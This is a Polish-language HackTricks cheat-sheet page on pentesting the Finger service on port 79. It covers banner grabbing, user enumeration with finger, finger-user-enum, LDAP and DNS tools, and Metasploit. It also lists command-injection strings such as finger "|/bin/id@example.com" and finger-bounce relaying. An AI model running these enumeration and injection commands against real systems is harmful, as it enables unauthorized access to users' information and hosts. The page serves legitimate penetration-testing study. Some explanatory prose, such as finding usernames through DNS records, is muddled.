79 - Pentesting Finger

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Podstawowe informacje

Program/usługa Finger służy do pobierania informacji o użytkownikach komputera. Zazwyczaj dostarczane informacje obejmują nazwę użytkownika, pełne imię i w niektórych przypadkach dodatkowe szczegóły. Te dodatkowe szczegóły mogą obejmować lokalizację biura i numer telefonu (jeśli dostępne), czas logowania użytkownika, okres bezczynności (czas bezczynności), ostatnią chwilę odczytu poczty przez użytkownika oraz zawartość plików planu i projektu użytkownika.

Domyślny port: 79

PORT   STATE SERVICE
79/tcp open  finger

Egzaminacja

Pobieranie baneru/Podstawowe połączenie

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Wyszukiwanie użytkowników

Wyszukiwanie użytkowników to proces identyfikowania i zbierania informacji o użytkownikach w celu uzyskania dostępu do systemu. Poniżej przedstawiam kilka technik, które można wykorzystać do przeprowadzenia takiego procesu.

1. Finger

Finger to protokół, który umożliwia uzyskanie informacji o użytkownikach z serwera. Można go wykorzystać do wyszukiwania użytkowników na zdalnym systemie. Aby użyć protokołu Finger, wystarczy wysłać zapytanie do serwera, podając nazwę użytkownika. Serwer odpowie, udostępniając informacje o użytkowniku, takie jak nazwa, opis, adres e-mail itp.

Aby przeprowadzić wyszukiwanie użytkowników za pomocą protokołu Finger, można użyć narzędzi takich jak finger lub finger-user-enum. Przykład użycia narzędzia finger-user-enum:

finger-user-enum.pl -U /path/to/usernames.txt -t <target>

Gdzie /path/to/usernames.txt to ścieżka do pliku zawierającego listę nazw użytkowników, a <target> to adres IP lub nazwa domenowa zdalnego systemu.

2. LDAP

LDAP (Lightweight Directory Access Protocol) to protokół używany do zarządzania i dostępu do katalogów. Można go wykorzystać do wyszukiwania użytkowników w katalogach LDAP. Aby przeprowadzić wyszukiwanie użytkowników za pomocą protokołu LDAP, można użyć narzędzi takich jak ldapsearch. Przykład użycia narzędzia ldapsearch:

ldapsearch -x -h <target> -b "dc=<domain>,dc=<com>" "(objectClass=user)"

Gdzie <target> to adres IP lub nazwa domenowa serwera LDAP, a <domain> i <com> to odpowiednie wartości domeny.

3. DNS

DNS (Domain Name System) to system, który przypisuje nazwy domenowe do adresów IP. Można wykorzystać DNS do wyszukiwania użytkowników, sprawdzając, czy istnieją rekordy DNS dla określonych nazw użytkowników. Aby przeprowadzić wyszukiwanie użytkowników za pomocą DNS, można użyć narzędzi takich jak dnsenum. Przykład użycia narzędzia dnsenum:

dnsenum --enum -f /path/to/usernames.txt <target>

Gdzie /path/to/usernames.txt to ścieżka do pliku zawierającego listę nazw użytkowników, a <target> to adres IP lub nazwa domenowa systemu.

4. Social Engineering

Inżynieria społeczna to technika polegająca na manipulowaniu ludźmi w celu uzyskania poufnych informacji. Można wykorzystać inżynierię społeczną do uzyskania informacji o użytkownikach, takich jak nazwy użytkowników, adresy e-mail, numery telefonów itp. Przykłady technik inżynierii społecznej to phishing, pretexting, tailgating itp.

Wyszukiwanie użytkowników jest ważnym krokiem w procesie penetrowania systemów. Dzięki odpowiednim narzędziom i technikom można zidentyfikować użytkowników i wykorzystać te informacje do dalszych działań.

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternatywnie można użyć finger-user-enum z pentestmonkey, kilka przykładów:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap wykonuje skrypt do wykonania za pomocą domyślnych skryptów

Metasploit używa więcej trików niż Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Wykonanie polecenia

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Wykorzystaj system jako przekaźnik dla finger

finger user@host@victim
finger @internal@external
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated